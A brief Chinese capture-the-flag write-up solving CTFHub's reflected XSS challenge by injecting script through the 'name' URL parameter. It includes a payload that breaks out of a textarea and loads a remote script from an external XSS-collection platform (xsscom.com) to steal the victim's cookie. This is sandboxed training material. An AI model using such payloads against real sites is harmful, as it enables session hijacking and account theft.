**
CTFHub-XSS-反射型
**
http://challenge-413363e656833f13.sandbox.ctfhub.com:10800/?name=<script>alert(1)</script>
看到URL直接,在后面加上<script>aler(1)</script>
通过上述实验,发现确实存在反射型XSS,接下来拿cookie
<script>alert(document.cookie)</script>
竟然没有回显cookie,就很离谱,问了一下大佬,只能借助XSS辅助平台
先随便注册个账号
创建任务,随便填
勾选默认模块
下一步
将xss代码,先复制下来,然后保存好,点击完成
</textarea>'"><script src=http://xsscom.com//Qu2LE4></script>
至此项目就完成了,将前面的XSS代码放到URL后面,即可
不放在send框中,就没cookie,采坑。。。。。。。。
值得高兴地是,第二次成功得到flag开心
参考链接:https://blog.csdn.net/solitudi/article/details/107544165